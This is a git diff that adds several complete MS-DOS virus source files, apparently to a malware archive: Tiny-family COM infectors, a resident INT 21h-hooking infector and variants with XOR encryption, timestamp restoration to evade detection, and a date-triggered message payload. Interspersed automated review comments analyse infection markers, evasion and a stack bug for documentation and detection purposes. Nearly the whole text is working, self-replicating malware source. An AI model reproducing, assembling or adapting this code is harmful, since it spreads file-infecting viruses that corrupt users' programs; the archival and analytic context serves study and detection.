+v_entry:
+ call self ; Determine the start addres of the virus body
+self:
+ pop si
+ sub si,3
+
+ push ax ; Save AX (to keep programs as DISKCOPY happy)
+
+; Check whether the virus is already in memory and just run the program if so:
+
+ mov ah,0E9
+ int 21
+
+ mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h)
+ xor cx,cx ; ES := 0
+ mov es,cx
+ mov cl,v_len ; CX := virus length
+ rep movsb ; Move the virus body there
+
+; Transfer control to cont: by PUSHing its address
+; on the stack and executing RETF:
+
+ push es
+ mov ax,cont-v_entry+seg_60
+ push ax
+ retf
+
+; The original first 4 bytes of the infected file:
+
+first4 db 0EBh, 2, 90, 90
+
+; Resume execution from here (but already in segment 60h):
+
+cont:
+
+; Install new INT 21h handler and move the old one at INT 32h:
+
+ mov di,21*4
+ mov cl,2
+ mov ax,int_21-v_entry+seg_60
+ cld
+lp:
+ push word ptr es:[di] ; Get old handler's address
+ pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h
+ stosw ; Install the new one
+ mov ax,cs
+ loop lp ; Loop until done
+
+; Save the original first 4 bytes of the infected program on the stack:
+
+ push word ptr cs:[first4-v_entry+seg_60]
+ push word ptr cs:[first4+2-v_entry+seg_60]
+
+run_pgm:
+ mov di,offset start ; Point DI at program's start
+ pop word ptr [di+2] ; Restore the first 4 bytes of the program
+ pop word ptr [di]
+ pop ax ; Restore the original value of AX
+ push ds
+ push ds ; ES := DS
+ pop es
+ push di ; Push 100h on the stack
+ retf
+
+mem_chk:
+
+; Push the original first 4 bytes of the infected program on the stack:
+
+ push word ptr [si+first4-v_entry]
+ push word ptr [si+first4+2-v_entry]
+ jmp run_pgm ; And run the original program
+
+int_21: ; New INT 21h handler
+ cmp ah,0E9 ; Memory check?
+ je mem_chk ; If infected, run the original program
+ cmp ax,4B00 ; EXEC function call?
+ jne end_21 ; Exit if not
+
+ push ax ; Save registers used
+ push bx
+ push cx
+ push dx
+ push di
+ push ds
+ push es
+
+ push cs ; ES := CS
+ pop es
+
+ mov ax,3D02 ; Open the file for both reading and writting
+ int 32
+ jc end_exec ; Exit on error
+ mov bx,ax ; Save the file handle in BX
+
+ mov ah,3F ; Read the first 4 bytes of the file
+ mov cx,4 ; 4 bytes to read
+ mov dx,first4-v_entry+seg_60 ; Put them in first4
+ mov di,dx ; Save first4 address in DI
+ push cs ; DS := CS
+ pop ds
+ int 32 ; Do it
+
+; Check whether the file is already infected or is an .EXE file.
+; The former contains the character `M' in its 3rd byte and
+; the latter contains it either in the 0th or in the 1st byte.
+
+ push di ; Save DI
+ mov al,'M' ; Look for `M'
+ repne scasb
+ pop di ; Restore DI
+ je close ; Exit if file not suitable for infection
+
+ mov ax,4202 ; Seek to the end of file
+ xor cx,cx
+ xor dx,dx
+ int 32 ; Do it
+
+ push ax ; Save file length
+
+ mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
+ mov cl,v_len ; Length of virus body
+ mov ah,40 ; Append virus to file
+ int 32 ; Do it
+
+ mov ax,4200 ; Seek to the file beginning
+ xor cx,cx
+ xor dx,dx
+ int 32 ; Do it
+
+ mov dx,di ; Point DX at first4
+ mov al,0E9 ; Near JMP opcode
+ stosb ; Form the first instruction of the file
+ pop ax ; Restore file length in AX
+ sub ax,3 ; Subtract 3 (first instruction length)
+ stosw ; Form the JMP's opperand
+ mov al,'M' ; Add a `M' character to mark the file
+ stosb ; as infected
+
+ mov cl,4 ; Overwrite the first 4 bytes of the file
+ mov ah,40
+ int 32 ; Do it
+
+close:
+ mov ah,3E ; Close the file
+ int 32
+
+end_exec:
+ pop es ; Restore used registers
+ pop ds
+ pop di
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+
+; Exit through the original INT 21h handler:
+
+end_21:
+ jmp dword ptr cs:[32*4]
+
+v_end equ $ ; End of virus body
+
+code ends
+ end start
+
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-b.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-b.asm
new file mode 100644
index 00000000..4c3b3726
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tiny-b.asm
@@ -0,0 +1,102 @@
+ PAGE ,132
+tinyv SEGMENT BYTE PUBLIC 'code'
+ ASSUME CS:tinyv
+ ASSUME SS:tinyv
+ ASSUME DS:tinyv
+H00000 DB 0
+H00001 DB 255 DUP(?)
+program PROC FAR
+ ASSUME ES:tinyv
+begin:
+ JMP pgstart ; start program
+exlbl LABEL BYTE
+ db 0CDh, 20h, 7, 8, 9
+pgstart:
+ CALL tinyvir
+mnprg PROC NEAR
+tinyvir:
+ POP SI ; get SI for storage
+ SUB SI,offset tinyvir ; reset SI to virus start
+ MOV BP,[SI+blnkdat] ; store SI in BP for return
+ ADD BP,offset exlbl ; Add to get original offset
+ LEA DX,[SI+fspec] ; get filespec (*.COM)
+ SUB CX,CX ; || (clear regs)
+ MOV AH,4EH ; || (find files)
+mainloop: ; \||/
+ INT 21H ; ----\/----
+ JC ack ; no more files found, terminate virus
+ MOV DX,009EH ; set file name pointer
+ MOV AX,3D02H ; open file
+ INT 21H ; do it!
+ MOV BX,AX ; move file handle to BX
+ MOV AH,3FH ; read file
+ JMP whatever
+ack:
+ JMP nofile
+whatever:
+ LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
+ MOV DI,DX ; set Dest Index to area for buffer (?)
+ MOV CX,0003H ; read 3 bytes
+ INT 21H ; do it!
+ CMP BYTE PTR [DI],0E9H ; check for JMP at start
+ JE infect ; If begins w/JMP, Infect
+nextfile:
+ MOV AH,4FH ; set int 21 to find next file
+ JMP mainloop ; next file, do it!
+infect:
+ MOV DX,[DI+01H] ; set # of bytes to move
+ MOV [SI+blnkdat],DX ; " " " " " "
+ SUB CX,CX ; " " " " " " (0 here)
+ NOP
+ MOV AX,4200H ; move file
+ INT 21H ; do it!
+ MOV DX,DI ; set dest index to area for buffer (?)
+ MOV CX,0002H ; two bytes
+ NOP
+ MOV AH,3FH ; read file
+ INT 21H ; do it!
+ CMP WORD PTR [DI],0807H ; check for infection
+ JE nextfile ; next file if infected
+ NOP
+ SUB DX,DX ; clear regs
+ SUB CX,CX ; " "
+ MOV AX,4202H ; move file pointer
+ INT 21H ; do it!
+ CMP DX,00H ; new pointer location 0?
+ NOP
+ JNE nextfile ; if no then next file
+ CMP AH,0FEH ; new pointer loc too high?
+ JNC nextfile ; yes, try again
+ MOV [SI+offset endprog+3],AX; point to data
+ NOP
+ MOV AH,40H ; write instruction
+ LEA DX,[SI+0105H] ; write buffer loc |
+ MOV CX,offset endprog-105h ; (size of virus) --\|/--
+ INT 21H ; do it!
+ JC exit ; error, bug out
+ MOV AX,4200H ; move pointer
+ NOP
+ SUB CX,CX ; clear reg
+ MOV DX,OFFSET H00001 ; where to set pointer
+ NOP
+ INT 21H ; do it!
+ MOV AH,40H ; write to file
+ LEA DX,[SI+offset endprog+3]; write data at SI+1AB
+ NOP
+ MOV CX,0002H ; two bytes (the JMP)
+ INT 21H ; do it!
+exit:
+ MOV AH,3EH ; close file
+ INT 21H ; do it!
+nofile:
+ JMP BP ; go to original file
+mnprg ENDP
+program ENDP
+blnkdat LABEL WORD
+ DW 0000H
+fspec LABEL WORD
+ DB '*.COM'
+ DB 0
+endprog LABEL WORD
+tinyv ENDS
+ END program
diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-c.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-c.asm
new file mode 100644
index 00000000..1c657a4b
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tiny-c.asm
@@ -0,0 +1,101 @@
+ PAGE ,132
+tinyv SEGMENT BYTE PUBLIC 'code'
+ ASSUME CS:tinyv
+ ASSUME SS:tinyv
+ ASSUME DS:tinyv
+H00000 DB 0
+H00001 DB 255 DUP(?)
+program PROC FAR
+ ASSUME ES:tinyv
+begin:
+ JMP pgstart ; start program
+exlbl LABEL BYTE
+ db 0CDh, 20h, 7, 8, 9
+pgstart:
+ CALL tinyvir
+mnprg PROC NEAR
+tinyvir:
+ POP SI ; get SI for storage
+ SUB SI,offset tinyvir ; reset SI to virus start
+ MOV BP,[SI+blnkdat] ; store SI in BP for return
+ ADD BP,offset exlbl ; Add to get original offset
+
+ LEA DX,[SI+fspec] ; get filespec (*.COM)
+ SUB CX,CX ; || (clear regs)
+ MOV AH,4EH ; || (find files)
+mainloop: ; \||/
+ INT 21H ; ----\/----
+ JC hiccup ; no more files found, terminate virus
+ MOV DX,009EH ; set file name pointer
+ MOV AX,3D02H ; open file
+ INT 21H ; do it!
+ MOV BX,AX ; move file handle to BX
+ MOV AH,3FH ; read file
+ LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
+ MOV DI,DX ; set Dest Index to area for buffer (?)
+ MOV CX,0003H ; read 3 bytes
+ INT 21H ; do it!
+ CMP BYTE PTR [DI],0E9H ; check for JMP at start
+ JE infect ; If begins w/JMP, Infect
+nextfile:
+ MOV AH,4FH ; set int 21 to find next file
+ JMP mainloop ; next file, do it!
+hiccup: JMP nofile
+infect:
+ MOV AX,5700h ; get date function
+ INT 21h ; do it!
+ PUSH DX ; store date + time
+ PUSH CX
+ MOV DX,[DI+01H] ; set # of bytes to move
+ MOV [SI+blnkdat],DX ; " " " " " "
+ SUB CX,CX ; " " " " " " (0 here)
+ MOV AX,4200H ; move file
+ INT 21H ; do it!
+ MOV DX,DI ; set dest index to area for buffer (?)
+ MOV CX,0002H ; two bytes
+ MOV AH,3FH ; read file
+ INT 21H ; do it!
+ CMP WORD PTR [DI],0807H ; check for infection
+ JE nextfile ; next file if infected
+ SUB DX,DX ; clear regs
+ SUB CX,CX ; " "
+ MOV AX,4202H ; move file pointer
+ INT 21H ; do it!
+ CMP DX,00H ; new pointer location 0?
+ JNE nextfile ; if no then next file
+ CMP AH,0FEH ; new pointer loc too high?
+ JNC nextfile ; yes, try again
+ MOV [SI+offset endprog+3],AX; point to data
+ MOV AH,40H ; write instruction
+ LEA DX,[SI+0105H] ; write buffer loc |
+ MOV CX,offset endprog-105h ; (size of virus) --\|/--
+ INT 21H ; do it!
+ JC exit ; error, bug out
+ MOV AX,4200H ; move pointer
+ SUB CX,CX ; clear reg
+ MOV DX,OFFSET H00001 ; where to set pointer
+ INT 21H ; do it!
+ MOV AH,40H ; write to file
+ LEA DX,[SI+offset endprog+3]; write data at SI+1AB
+ MOV CX,0002H ; two bytes (the JMP)
+ INT 21H ; do it!
+ MOV AX,5701h ; store date
+ POP CX ; restore time
+ POP DX ; restore date
+ INT 21h ; do it!
+exit:
+ MOV AH,3EH ; close file
+ INT 21H ; do it!
+nofile:
+
+ JMP BP ; go to original file
+mnprg ENDP
+program ENDP
+blnkdat LABEL WORD
+ DW 0000H
+fspec LABEL WORD
+ DB '*.COM'
+ DB 0
+endprog LABEL WORD
+tinyv ENDS
+ END program
diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny-f.asm b/MSDOS/Virus.MSDOS.Unknown.tiny-f.asm
new file mode 100644
index 00000000..5fafe9a8
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tiny-f.asm
@@ -0,0 +1,182 @@
+tinyv SEGMENT BYTE PUBLIC 'code'
+ ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
+
+ ORG 100h
+
+DOS EQU 21h
+
+start: JMP pgstart
+exlbl: db 0CDh, 20h, 7, 8, 9
+pgstart:CALL tinyvir
+tinyvir:
+ POP SI ; get SI for storage
+ SUB SI,offset tinyvir ; reset SI to virus start
+ MOV BP,[SI+blnkdat] ; store SI in BP for return
+ ADD BP, OFFSET exlbl
+ CALL endecrpt
+ JMP SHORT realprog
+
+;-----------------------------------------------------------------------------
+; nonencrypted subroutines start here
+;-----------------------------------------------------------------------------
+
+; PCM's encryption was stupid, mine is better - Dark Angel
+endecrpt:
+; Only need to save necessary registers - Dark Angel
+ PUSH AX ; store registers
+ PUSH BX
+ PUSH CX
+ PUSH SI
+; New, better, more compact encryption engine
+ MOV BX, [SI+EN_VAL]
+ ADD SI, offset realprog
+ MOV CX, endenc - realprog
+ SHR CX, 1
+ JNC start_encryption
+ DEC SI
+start_encryption:
+ MOV DI, SI
+encloop:
+ LODSW ; DS:[SI] -> AX
+ XOR AX, BX
+ STOSW
+ LOOP encloop
+
+ POP SI ; restore registers
+ POP CX
+ POP BX
+ POP AX
+ RET
+;-----end of encryption routine
+nfect:
+ CALL endecrpt
+ MOV [SI+offset endprog+3],AX; point to data
+ MOV AH,40H ; write instruction
+ LEA DX,[SI+0105H] ; write buffer loc |
+ MOV CX,offset endprog-105h ; (size of virus) --\|/--
+ INT DOS ; do it!
+ PUSHF
+ CALL endecrpt
+ POPF
+ JC outa1 ; error, bug out
+ RET
+outa1:
+ JMP exit
+
+
+;-----------------------------------------------------------------------------
+; Unencrypted routines end here
+;-----------------------------------------------------------------------------
+realprog:
+ CLD ; forward direction for string ops
+; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
+; Instead, set DTA to SI+ENDPROG+131h
+ MOV AH, 1Ah ; Set DTA
+ LEA DX, [SI+ENDPROG+131h] ; to DS:DX
+ INT 21h
+
+ LEA DX,[SI+fspec] ; get filespec (*.COM)
+ XOR CX, CX ; || (clear regs)
+ MOV AH,4EH ; || (find files)
+mainloop: ; \||/
+ INT DOS ; ----\/----
+ JC hiccup ; no more files found, terminate virus
+; Next part had to be changed to account for new DTA address - Dark Angel
+ LEA DX, [SI+ENDPROG+131h+30]; set file name pointer
+ ; (offset 30 is DTA filename start)
+ MOV AX,3D02H ; open file
+ INT DOS ; do it!
+ MOV BX,AX ; move file handle to BX
+ MOV AH,3FH ; read file
+ LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
+ MOV DI,DX ; set Dest Index to area for buffer
+ MOV CX,0003H ; read 3 bytes
+ INT DOS ; do it!
+ CMP BYTE PTR [DI],0E9H ; check for JMP at start
+ JE infect ; If begins w/JMP, Infect
+nextfile:
+ MOV AH,4FH ; set int 21 to find next file
+ JMP mainloop ; next file, do it!
+hiccup: JMP exit
+infect:
+ MOV AX,5700h ; get date function
+ INT DOS ; do it!
+ PUSH DX ; store date + time
+ PUSH CX
+ MOV DX,[DI+01H] ; set # of bytes to move
+ MOV [SI+blnkdat],DX ; " " " " " "
+; Tighter Code here - Dark Angel
+ XOR CX,CX ; " " " " " " (0 here)
+ MOV AX,4200H ; move file
+ INT DOS ; do it!
+ MOV DX,DI ; set dest index to area for buffer
+ MOV CX,0002H ; two bytes
+ MOV AH,3FH ; read file
+ INT DOS ; do it!
+ CMP WORD PTR [DI],0807H ; check for infection
+ JE nextfile ; next file if infected
+getaval: ; encryption routine starts here
+; My modifications here - Dark Angel
+ MOV AH, 2Ch ; DOS get TIME function
+ INT DOS ; do it!
+ OR DX, DX ; Is it 0?
+ JE getaval ; yeah, try again
+ MOV word ptr [si+offset en_val], DX ; Store it
+; Tighter code here - Dark Angel
+ XOR DX,DX ; clear regs
+ XOR CX,CX ; " "
+ MOV AX,4202H ; move file pointer
+ INT DOS ; do it!
+ OR DX,DX ; new pointer location 0?
+ JNE nextfile ; if no then next file
+ CMP AH,0FEH ; new pointer loc too high?
+ JNC nextfile ; yes, try again
+ CALL nfect
+ MOV AX,4200H ; move pointer
+ XOR CX, CX ; clear reg
+ MOV DX,OFFSET 00001 ; where to set pointer
+ INT DOS ; do it!
+ MOV AH,40H ; write to file
+ LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER
+ MOV CX,0002H ; two bytes (the JMP)
+ INT DOS ; do it!
+ MOV AX,5701h ; store date
+ POP CX ; restore time
+ POP DX ; restore date
+ INT DOS ; do it!
+exit:
+ MOV AH,3EH ; close file
+ INT DOS ; do it!
+
+; Return DTA to old position - Dark Angel
+
+ MOV AH, 1Ah ; Set DTA
+ MOV DX, 80h ; to PSP DTA
+ INT 21h
+
+ JMP BP
+
+;-----------------------------------------------------------------------------
+; encrypted data goes here
+;-----------------------------------------------------------------------------
+
+fspec LABEL WORD
+ DB '*.COM',0
+nondata DB 'Tiny-F version 1.1' ; Program identification
+ DB '@&' ; author identification
+ DB 'Released 10-19-91' ; release date
+endenc LABEL BYTE ; end of encryption zone
+;-----------------------------------------------------------------------------
+; nonencrypted data goes anywhere after here
+;-----------------------------------------------------------------------------
+
+blnkdat LABEL WORD
+ DW 0000H
+
+; Only en_val is needed now because of new encryption mechanism
+en_val DW 0h
+
+endprog LABEL WORD
+tinyv ENDS
+ END start
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny.asm b/MSDOS/Virus.MSDOS.Unknown.tiny.asm
new file mode 100644
index 00000000..e65f88ae
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tiny.asm
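Review bot: The file has no header at all, and the fact a reader most needs stated up front is that the identification strings `'Tiny-F version 1.1'` and `'Released 10-19-91'` sit between realprog and endenc, the span that endecrpt XORs word-by-word with en_val (taken from the DOS time call, AH=2Ch, and forced non-zero by the getaval loop), so they are not a usable plaintext signature in an infected file; only the code before realprog, the `0807H` marker test and the blnkdat/en_val words are stored in clear. This file and tiny-c also restore the file date and time (AX=5700h before writing, AX=5701h after), so timestamp-based triage will not flag the modified .COM files. A header along the lines of `; Tiny-F: realprog..endenc is XOR-encrypted with en_val (DOS time); clear-text parts are the decryptor, the 0807h marker check and blnkdat/en_val` would record this for the archive.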
@@ -0,0 +1,120 @@
+
+PAGE 59,132
+
+;
+;
+; S
+;
+; Created: 4-Aug-90
+; Version:
+; Passes: 9 Analysis Options on: H
+;
+;
+;
+
+data_2e equ 1ABh ; (946E:01AB=0)
+
+seg_a segment byte public
+ assume cs:seg_a, ds:seg_a
+
+
+ org 100h
+
+s proc far
+
+start:
+ jmp loc_1 ; (0108)
+ db 0CDh, 20h, 7, 8, 9
+loc_1:
+ call sub_1 ; (010B)
+
+s endp
+
+;
+; SUBROUTINE
+;
+
+sub_1 proc near
+ pop si
+ sub si,10Bh
+ mov bp,data_1[si] ; (946E:01A0=0)
+ add bp,103h
+ lea dx,[si+1A2h] ; Load effective addr
+ xor cx,cx ; Zero register
+ mov ah,4Eh ; 'N'
+loc_2:
+ int 21h ; DOS Services ah=function 4Eh
+ ; find 1st filenam match @ds:dx
+ jc loc_6 ; Jump if carry Set
+ mov dx,9Eh
+ mov ax,3D02h
+ int 21h ; DOS Services ah=function 3Dh
+ ; open file, al=mode,name@ds:dx
+ mov bx,ax
+ mov ah,3Fh ; '?'
+ lea dx,[si+1A8h] ; Load effective addr
+ mov di,dx
+ mov cx,3
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, cx=bytes, to ds:dx
+ cmp byte ptr [di],0E9h
+ je loc_4 ; Jump if equal
+loc_3:
+ mov ah,4Fh ; 'O'
+ jmp short loc_2 ; (0120)
+loc_4:
+ mov dx,[di+1]
+ mov data_1[si],dx ; (946E:01A0=0)
+ xor cx,cx ; Zero register
+ mov ax,4200h
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, cx,dx=offset
+ mov dx,di
+ mov cx,2
+ mov ah,3Fh ; '?'
+ int 21h ; DOS Services ah=function 3Fh
+ ; read file, cx=bytes, to ds:dx
+ cmp word ptr [di],807h
+ je loc_3 ; Jump if equal
+ xor dx,dx ; Zero register
+ xor cx,cx ; Zero register
+ mov ax,4202h
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, cx,dx=offset
+ cmp dx,0
+ jne loc_3 ; Jump if not equal
+ cmp ah,0FEh
+ jae loc_3 ; Jump if above or =
+ mov ds:data_2e[si],ax ; (946E:01AB=0)
+ mov ah,40h ; '@'
+ lea dx,[si+105h] ; Load effective addr
+ mov cx,0A3h
+ int 21h ; DOS Services ah=function 40h
+ ; write file cx=bytes, to ds:dx
+ jc loc_5 ; Jump if carry Set
+ mov ax,4200h
+ xor cx,cx ; Zero register
+ mov dx,1
+ int 21h ; DOS Services ah=function 42h
+ ; move file ptr, cx,dx=offset
+ mov ah,40h ; '@'
+ lea dx,[si+1ABh] ; Load effective addr
+ mov cx,2
+ int 21h ; DOS Services ah=function 40h
+ ; write file cx=bytes, to ds:dx
+loc_5:
+ mov ah,3Eh ; '>'
+ int 21h ; DOS Services ah=function 3Eh
+ ; close file, bx=file handle
+loc_6:
+ jmp bp ;*Register jump
+data_1 dw 0 ; Data table (indexed access)
+ db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
+sub_1 endp
+
+
+seg_a ends
+
+
+
+ end start
diff --git a/MSDOS/Virus.MSDOS.Unknown.tiny133.asm b/MSDOS/Virus.MSDOS.Unknown.tiny133.asm
new file mode 100644
index 00000000..ecee24b0
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tiny133.asm
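Review bot: The Sourcer header at the top of this file is empty (`; S`, `; Version:`), so nothing states what the sample is or how it recognises its victims, although the code fixes both: the infection test reads the two bytes at the host's original JMP target and compares them with `807h` (`cmp word ptr [di],807h` / `je loc_3`), the appended body is the `0A3h` bytes starting at `si+105h`, and hosts whose end-of-file position has a non-zero high word or `ah >= 0FEh` are skipped. I would add a header comment along the lines of `; Appending *.COM infector: marker 0807h at the host's original JMP target; appends 0A3h bytes; skips files whose size reaches 0FE00h; reads the found filename from 9Eh, the name field of the default DTA at PSP:80h`. Unlike the Tiny-D variant in the same commit, this one issues no 5700h/5701h calls, so the host's date/time stamp changes on infection, which is worth recording for anyone writing detection for it. A caveat that the listing assembles to a live infector and must only be built inside an isolated VM would also be appropriate, since the sub_1 body is the entire file.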
@@ -0,0 +1,94 @@
+VSize=085h
+
+Code Segment
+ Assume CS:Code
+ org 0
+ db 4Dh
+ jmp Start
+
+ Org 600h
+
+Bytes db 0CDh,20h,90h,90h
+
+Start: mov si, 0100h
+ mov bx, offset Int21
+ mov cx, 0050h
+ mov di, si
+ add si, [si+2]
+ push di
+ movsw
+ movsw
+ mov es, cx
+ cmpsb
+ je StartFile
+ dec si
+ dec di
+ rep movsw
+ mov es, cx
+ xchg ax, bx
+ xchg ax, cx
+Loop0: xchg ax, cx
+ xchg ax, word ptr es:[di-120h]
+ stosw
+ jcxz Loop0
+ xchg ax, bx
+StartFile:
+ push ds
+ pop es
+ ret
+
+Int21: cmp ax, 4B00h
+ jne End21
+Exec: push ax
+ push bx
+ push dx
+ push ds
+ push es
+ mov ax, 3D02h
+ call DoInt21
+ jc EndExec
+ cbw ;Zero AH
+ cwd ;Zero DX
+ mov bx, si ;Move handle to BX
+ mov ds, ax ;Set DS and ES to 60h,
+ mov es, ax ;the virus data segment
+ mov ah, 3Fh ;Read first 4 bytes
+ int 69h
+ mov al, 4Dh
+ scasb ;Check for 4D5Ah or infected file mark
+ je Close ;.EXE or already infected
+ mov al, 2
+ call LSeek ;Seek to the end, SI now contains file size
+ mov cl, VSize ;Virus size in CX, prepare to write
+ int 69h ;AH is 40h, i.e. Write operation
+ mov ax, 0E94Dh ;Virus header in AX
+ stosw ;Store it
+ xchg ax, si ;Move file size in AX
+ stosw ;Complete JMP instruction
+ xchg ax, dx ;Zero AX
+ call LSeek ;Seek to the beginning
+ int 69h ;AH is 40h, write the virus header
+Close: mov ah,3Eh ;Close the file
+ int 69h
+EndExec: pop es
+ pop ds
+ pop dx
+ pop bx
+ pop ax
+End21: jmp dword ptr cs:[69h * 4]
+
+LSeek: mov ah, 42h ;Seek operation
+ cwd ;Zero DX
+DoInt21: xor cx, cx ;External entry for Open, zero cx
+ int 69h
+ mov cl, 4 ;4 bytes will be read/written
+ xchg ax, si ;Store AX in SI
+ mov ax, 4060h ;Prepare AH for Write
+ xor di, di ;Zero DI
+ ret
+
+VLen = $ - offset Bytes
+
+Code EndS
+End
+ 
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.tinyd.asm b/MSDOS/Virus.MSDOS.Unknown.tinyd.asm
new file mode 100644
index 00000000..778b9804
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tinyd.asm
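Review bot: The file has no header at all, and the facts a reader needs are only recoverable from the code: `VSize=085h` (133 bytes) is the length written to each host, the resident copy is placed at 0050h:0104h (`mov cx,0050h` / `mov es,cx` / `rep movsw`, consistent with `Org 600h`), residency is decided by a single-byte `cmpsb` at that address, and INT 69h holds the saved INT 21h vector — every DOS call in the handler is `int 69h` and it chains with `jmp dword ptr cs:[69h * 4]`. I would put that in a header comment: `; Resident COM infector, 133 bytes: hooks INT 21h AX=4B00h, keeps the old INT 21h vector in INT 69h, image at 0050h:0104h (linear 604h); infected hosts start with 4Dh`. The comment `;Check for 4D5Ah or infected file mark` overstates what `mov al,4Dh` / `scasb` does: only the first byte is compared, so any program whose first byte is 4Dh is skipped as if already infected, and there is no size check between `call LSeek` and the `int 69h` write, so the 64K COM limit is not guarded. The trailing `+ ` line before `\ No newline at end of file` looks like a stray whitespace-only last line in the upload.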
@@ -0,0 +1,116 @@
+tinyv SEGMENT BYTE PUBLIC 'code'
+ ASSUME CS:tinyv
+ ASSUME SS:tinyv
+ ASSUME DS:tinyv
+H00000 DB 0
+H00001 DB 255 DUP(?)
+program PROC FAR
+ ASSUME ES:tinyv
+begin:
+ JMP pgstart ; start program
+exlbl LABEL BYTE
+ db 0CDh, 20h, 7, 8, 9
+pgstart:
+ CALL tinyvir
+mnprg PROC NEAR
+tinyvir:
+ POP SI ; get SI for storage
+ SUB SI,offset tinyvir ; reset SI to virus start
+ MOV BP,[SI+blnkdat] ; store SI in BP for return
+ ADD BP,offset exlbl ; Add to get original offset
+
+ LEA DX,[SI+fspec] ; get filespec (*.COM)
+ SUB CX,CX ; || (clear regs)
+ MOV AH,4EH ; || (find files)
+mainloop: ; \||/
+ INT 21H ; ----\/----
+ JC hiccup ; no more files found, terminate virus
+ MOV DX,009EH ; set file name pointer
+ MOV AX,3D02H ; open file
+ INT 21H ; do it!
+ MOV BX,AX ; move file handle to BX
+ MOV AH,3FH ; read file
+ LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
+ MOV DI,DX ; set Dest Index to area for buffer (?)
+ MOV CX,0003H ; read 3 bytes
+ INT 21H ; do it!
+ CMP BYTE PTR [DI],0E9H ; check for JMP at start
+ JE infect ; If begins w/JMP, Infect
+nextfile:
+ MOV AH,4FH ; set int 21 to find next file
+ JMP mainloop ; next file, do it!
+hiccup: JMP nofile
+infect:
+ MOV AX,5700h ; get date function
+ INT 21h ; do it!
+ PUSH DX ; store date + time
+ PUSH CX
+ MOV DX,[DI+01H] ; set # of bytes to move
+ MOV [SI+blnkdat],DX ; " " " " " "
+ SUB CX,CX ; " " " " " " (0 here)
+ MOV AX,4200H ; move file
+ INT 21H ; do it!
+ MOV DX,DI ; set dest index to area for buffer (?)
+ MOV CX,0002H ; two bytes
+ MOV AH,3FH ; read file
+ INT 21H ; do it!
+ CMP WORD PTR [DI],0807H ; check for infection
+ JE nextfile ; next file if infected
+ SUB DX,DX ; clear regs
+ SUB CX,CX ; " "
+ MOV AX,4202H ; move file pointer
+ INT 21H ; do it!
+ CMP DX,00H ; new pointer location 0?
+ JNE nextfile ; if no then next file
+ CMP AH,0FEH ; new pointer loc too high?
+ JNC nextfile ; yes, try again
+ MOV [SI+offset endprog+3],AX; point to data
+ MOV AH,40H ; write instruction
+ LEA DX,[SI+0105H] ; write buffer loc |
+ MOV CX,offset endprog-105h ; (size of virus) --\|/--
+ INT 21H ; do it!
+ JC exit ; error, bug out
+ MOV AX,4200H ; move pointer
+ SUB CX,CX ; clear reg
+ MOV DX,OFFSET H00001 ; where to set pointer
+ INT 21H ; do it!
+ MOV AH,40H ; write to file
+ LEA DX,[SI+offset endprog+3]; write data at SI+1AB
+ MOV CX,0002H ; two bytes (the JMP)
+ INT 21H ; do it!
+ MOV AX,5701h ; store date
+ POP CX ; restore time
+ POP DX ; restore date
+ INT 21h ; do it!
+exit:
+ MOV AH,2Ah ; date function
+ INT 21h ; do it!
+ CMP AL,0h ; is it sunday?
+ JNE closal ; nope, quit
+ CMP DH,6h ; is it June?
+ JNE closal ; nope, quit
+ PUSH BX
+ PUSH SI
+ MOV AH,9h ; print string
+ MOV DX, OFFSET nondata ; string to print
+ ADD DX,SI
+ INT 21h ; print it
+ MOV DX, OFFSET nondat2 ; next string
+ ADD DX, SI
+ INT 21h ; print it!
+ POP BX
+closal: MOV AH,3EH ; close file
+ INT 21H ; do it!
+nofile: JMP BP ; go to original file
+mnprg ENDP
+program ENDP
+blnkdat LABEL WORD
+ DW 0000H
+fspec LABEL WORD
+ DB '*.COM'
+ DB 0
+nondata DB 'Tiny-D version 1.1$ '; Program identification
+nondat2 DB ' by @&$' ; author identification
+endprog LABEL WORD
+tinyv ENDS
+ END program
diff --git a/MSDOS/Virus.MSDOS.Unknown.tit.asm b/MSDOS/Virus.MSDOS.Unknown.tit.asm
new file mode 100644
index 00000000..9657ebe9
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tit.asm
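Review bot: The Sunday-in-June payload at `exit:` is stack-unbalanced: it does `PUSH BX` / `PUSH SI` before the two AH=9 prints but only `POP BX`, so BX receives the saved SI, `closal` then closes whatever handle number that value happens to be instead of the file just infected, and the original BX is still on the stack when `nofile: JMP BP` hands control to the host. Since this is an archived sample rather than code to be repaired, I would document it instead of fixing it, e.g. at `PUSH SI`: `; BUG: SI is pushed but never popped - POP BX below receives SI, the wrong handle is closed and the host is entered with one extra word on the stack`. A header note would also help: `MOV DX,009EH` assumes the found name sits in the default DTA at PSP:80h (the Tiny-F variant in this same commit relocates its DTA for that reason), and the 5700h/5701h pair restores the host's timestamp, so a changed mtime is not a signal for this variant. The `JC exit` after the body write skips the timestamp restore but still runs the date check and close, which is consistent with the rest of the error handling here.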
